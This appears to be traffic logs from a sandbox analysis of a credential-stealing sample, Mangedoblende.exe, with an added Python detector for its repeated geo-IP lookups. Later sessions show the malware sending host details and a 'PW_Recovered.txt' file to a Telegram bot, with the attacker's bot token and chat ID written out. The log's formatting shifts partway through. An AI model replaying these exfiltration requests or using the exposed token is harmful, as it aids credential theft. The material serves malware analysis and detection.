2025-01-10 18:17:32 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 18:17:33 UTC | 866 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:32 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847842
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0T1X8fOFjswddGdjNs%2B2Abee8%2FxxlXZAcnoO%2BPl6cNlDFXgaRbni5%2FquexeNBmMPytHVj9zJLdgdEKNs2ZVu73BRT0rHJKhnOd5t%2F87flri722KN9r1%2FZ33Bmi%2BQGQWYK09dwjr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa1d0b50c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=34465&min_rtt=1570&rtt_var=20145&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1859872&cwnd=178&unsent_bytes=0&cid=f99be04664c542b6&ts=169&x=0"
2025-01-10 18:17:33 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49969 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:35 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 18:17:35 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:35 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847844
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zH4yU0iOUWxLAhZLLa4haJnAY0EJxSucTLEE6ZETJpmjMBcEsmTysh8kkLPvmuBwRYD6hTFlNlge8bMauqsgvBq1dFdQnbSCrFoT4muNbduHSWb%2FEm3ArJNa4V7j6wDFjtMAF7eq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa2a5ccf42c0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1690&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=212&unsent_bytes=0&cid=154c52fd0db34dc3&ts=148&x=0"
2025-01-10 18:17:35 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49977 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:36 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 18:17:36 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:36 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847845
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DznHkgULEuRChufuwDIQwCL%2F6xICB4%2FXVuSlq5PANbtabuoA7xRgX6z5ZKVMpv8aLoO66FIMUjJtMOpsIsxw5pKJBi3t0b%2FctU0%2FTr4whEmUtXxQqWmD63YqHSNuZJrQBQLIGQs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa331fea42c0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1793&rtt_var=708&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1628555&cwnd=212&unsent_bytes=0&cid=ea73b5650b805e79&ts=135&x=0"
2025-01-10 18:17:36 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49988 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:37 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 18:17:38 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:38 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847847
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iaOQaIqodSAqAWemu4jYXe2Xl3%2BXUrKTlFsDRG6UBIHJif2HvZqOHZDNKJwuCKSQerUazS4IRcQWxMzmtyU4iLgVSBC3HAl%2FdtQbcCCX8594N9S5lFvm7LYCLpBjPFrYaZI2aAvw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa3c7e02c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1584&rtt_var=713&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=178&unsent_bytes=0&cid=2e1b36c4f8b694d9&ts=133&x=0"
2025-01-10 18:17:38 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49990 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 18:17:40 UTC | 863 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:39 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847849
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WT8tjbhyWRyHTOZnZ3dkFyTReCcASLAB5yzZu%2FaJUOyPZWGUiqAuxc9oyjY6ry24nM4sdgQ9%2BmbtXvYj%2FwOdWO%2Bqqv9wUE7Iqoa%2F6zqqs4WaBmr8BikklC8UFRL9b%2Fu85z%2BMvbTU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa48ba3bde9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1551&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1801357&cwnd=209&unsent_bytes=0&cid=48cc8ca009c75a54&ts=141&x=0"
2025-01-10 18:17:40 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49992 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:42 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 18:17:42 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:42 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847851
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sijm5oXblDvTlUgYyXtB95OJIjXuet6aDsnr8t3%2BYuZTix29GbhhIJw3I7O42y9CM5XZ4WkgV2l76wXv1CLexf3Vx5IiGBoBONHVM2QdjVloaaj50yRLBp43AAFG6htgEh0NJnIp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa583ade4363-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1548&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1835323&cwnd=240&unsent_bytes=0&cid=86a6f808a7e38014&ts=148&x=0"
2025-01-10 18:17:42 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


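The sessions above are the traffic behind the report's "Tries to detect the country of the analysis system (by using the IP)" signature: the dropped Mangedoblende.exe asks reallyfreegeoip.org for the geolocation of its own public address, about once a second, session after session. Below is an added detection example, not code from the Joe Sandbox report or from the malware, that replays these sessions as constructed records, applies the two checks an analyst would key on (a requester running from a user Temp directory, and the same lookup repeated), and parses the XML reply exactly as the report prints it, where the body is cut off at `</TimeZo`. The Firefox control session, the three-lookup threshold and the well-formed XML variant (the truncated body with its closing tags added, no extra fields) are assumptions made for the example.

```python
"""Flag geo-IP host profiling of the kind shown in the sessions above.

Added example; not part of the Joe Sandbox report or the sample itself.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from dataclasses import dataclass

# The only geo-IP service contacted in this report. Other services would be
# added here as needed; none are assumed.
GEOIP_HOSTS = {"reallyfreegeoip.org"}
GEOIP_PATH_RE = re.compile(r"^/(?:xml|json|csv)/")
# Image path under %LOCALAPPDATA%\Temp, as for Mangedoblende.exe above.
TEMP_PATH_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass(frozen=True)
class HttpSession:
    session_id: int
    process: str
    host: str
    request_line: str
    response_body: str


# Response body as the report prints it: only the start of the 362-byte reply
# is shown, so the XML breaks off inside the closing TimeZone tag.
TRUNCATED_BODY = (
    "<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n\t"
    "<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>\n\t"
    "<RegionName>New York</RegionName>\n\t<City>New York</City>\n\t"
    "<ZipCode>10118</ZipCode>\n\t<TimeZone>America/New_York</TimeZo"
)
# Constructed well-formed variant: closing tags completed, nothing else added.
WELL_FORMED_BODY = TRUNCATED_BODY + "ne>\n</Response>"

MALWARE_PATH = r"C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
REQUEST = "GET /xml/8.46.123.189 HTTP/1.1"

# Sessions 4 to 9 from the report, plus one constructed benign lookup from a
# browser as a control (the control is an assumption, not in the report).
SAMPLE_SESSIONS = [
    HttpSession(n, MALWARE_PATH, "reallyfreegeoip.org", REQUEST, TRUNCATED_BODY)
    for n in range(4, 10)
] + [
    HttpSession(99, r"C:\Program Files\Mozilla Firefox\firefox.exe",
                "reallyfreegeoip.org", "GET /xml/ HTTP/1.1", WELL_FORMED_BODY)
]


def parse_geoip_response(body: str) -> dict:
    """Return tag -> text for a freegeoip-style XML body.

    A strict parse fails on the truncated body the report shows, so fall back
    to scanning complete <Tag>value</Tag> pairs; CountryCode still comes out.
    """
    try:
        return {child.tag: (child.text or "") for child in ET.fromstring(body)}
    except ET.ParseError:
        return dict(re.findall(r"<(\w+)>([^<]*)</\1>", body))


def is_geoip_lookup(session: HttpSession) -> bool:
    """True when the request targets a geo-IP service's lookup endpoint."""
    parts = session.request_line.split(" ")
    path = parts[1] if len(parts) > 1 else ""
    return session.host.lower() in GEOIP_HOSTS and GEOIP_PATH_RE.match(path) is not None


def find_geoip_profiling(sessions, min_lookups: int = 3) -> list:
    """One finding per process that queries a geo-IP service from a Temp
    path, or repeats the query at least min_lookups times (threshold assumed)."""
    by_process = defaultdict(list)
    for s in sessions:
        if is_geoip_lookup(s):
            by_process[s.process].append(s)
    findings = []
    for process, hits in by_process.items():
        from_temp = TEMP_PATH_RE.search(process) is not None
        if not from_temp and len(hits) < min_lookups:
            continue
        geo = parse_geoip_response(hits[-1].response_body)
        findings.append({
            "process": process,
            "lookups": len(hits),
            "session_ids": [h.session_id for h in hits],
            "from_temp": from_temp,
            "public_ip": geo.get("IP"),
            "country": geo.get("CountryCode"),
        })
    return findings


if __name__ == "__main__":
    for finding in find_geoip_profiling(SAMPLE_SESSIONS):
        print(finding)
```

Keying on the process path and the repetition, rather than on the domain alone, matters because geo-IP services have plenty of legitimate clients; a single lookup from a browser is left alone, while six lookups in ten seconds from an executable in the user's Temp folder are exactly the pattern the sandbox flagged.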
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49994 | 104.21.96.1 | 443 | 1292 | C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:17:44 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 18:17:44 UTC | 863 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847853
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7xBOCIdqZ6j4elE0TBKad7xBYksCqCg%2FxDS97MJJD%2BXOlsxJNTj4y%2BXKI1Q4tpD9%2BHSBA2f6%2FOqQx%2FqLlM6VjPZfs5eM7mSwN2fjmDG%2FPDaDdZykKytgPC6fZGLWCjuVN0wbfmXI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa667f2472a4-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2242&min_rtt=2012&rtt_var=919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1451292&cwnd=212&unsent_bytes=0&cid=33caa6d40fc17a8e&ts=163&x=0"
                                                                                                                                                                          2025-01-10 18:17:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 10
Source IP: 192.168.2.5
Source Port: 49996
Destination IP: 104.21.96.1
Destination Port: 443
PID: 1292
Process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp / Bytes transferred / Direction / Data:

2025-01-10 18:17:45 UTC, 85 bytes, OUT:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

2025-01-10 18:17:46 UTC, 853 bytes, IN:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:17:46 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1847855
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0kNMfVbtaCnh0g5eShEnTaqNr0Xg0khNNbPdLbQvHKYEE8f4A78BZcw51pf%2BX%2FnCQMFaConHuZmXlfiO9wUiMfywRPwDsiNmLd8tIzvQJ11xwR8cWNxCQk7VpxxtEf4o7cvHsqiP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffeaa6e788c4363-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1592&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1810291&cwnd=240&unsent_bytes=0&cid=8a43b0163b03af04&ts=142&x=0"

2025-01-10 18:17:46 UTC, 362 bytes, IN:
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 11
Source IP: 192.168.2.5
Source Port: 49997
Destination IP: 149.154.167.220
Destination Port: 443
PID: 1292
Process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp / Bytes transferred / Direction / Data:

2025-01-10 18:17:46 UTC, 349 bytes, OUT:
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

2025-01-10 18:17:47 UTC, 344 bytes, IN:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 18:17:47 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

2025-01-10 18:17:47 UTC, 55 bytes, IN:
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID: 12
Source IP: 192.168.2.5
Source Port: 49998
Destination IP: 149.154.167.220
Destination Port: 443
PID: 1292
Process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp / Bytes transferred / Direction / Data:

2025-01-10 18:17:53 UTC, 346 bytes, OUT:
POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3278838ce892
Host: api.telegram.org
Content-Length: 582

2025-01-10 18:17:53 UTC, 582 bytes, OUT:
Data Ascii: --------------------------8dd3278838ce892Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:980108Date and Time: 10/01/2025 / 13:17:28

2025-01-10 18:17:54 UTC, 388 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 18:17:54 GMT
Content-Type: application/json
Content-Length: 538
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

2025-01-10 18:17:54 UTC, 538 bytes, IN:
